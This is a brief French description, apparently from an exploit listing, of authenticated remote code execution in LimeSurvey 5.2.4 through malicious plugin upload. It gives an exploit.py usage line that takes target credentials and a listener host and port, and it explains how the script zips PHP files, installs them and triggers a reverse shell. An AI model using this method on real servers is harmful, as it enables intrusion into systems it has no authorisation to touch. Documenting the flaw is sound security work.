
Exécution de commandes à distance authentifiée (privilégiée) dans LimeSurvey version 5.2.4 via le téléversement et l'installation de plugins permet à un utilisateur distant de téléverser un fichier de code PHP arbitraire.
L'exécution de commandes à distance authentifiée (privilégiée) dans LimeSurvey version 5.2.4, via le téléversement et l'installation de plugins, permet à un utilisateur distant de téléverser un fichier de code PHP arbitraire.
python3 exploit.py --url <http://example.com> --user <userName> --password <userPassword> --lhost <localHost> --lport <localPort>
Un utilisateur superadministrateur est autorisé à charger des modules de plugin via le panneau d'administration de LimeSurvey. Le script crée localement les fichiers, les compresse dans une archive ZIP et les téléverse. Ensuite, un appel est effectué pour installer, activer et exécuter les modules, ce qui exécute le reverse shell.
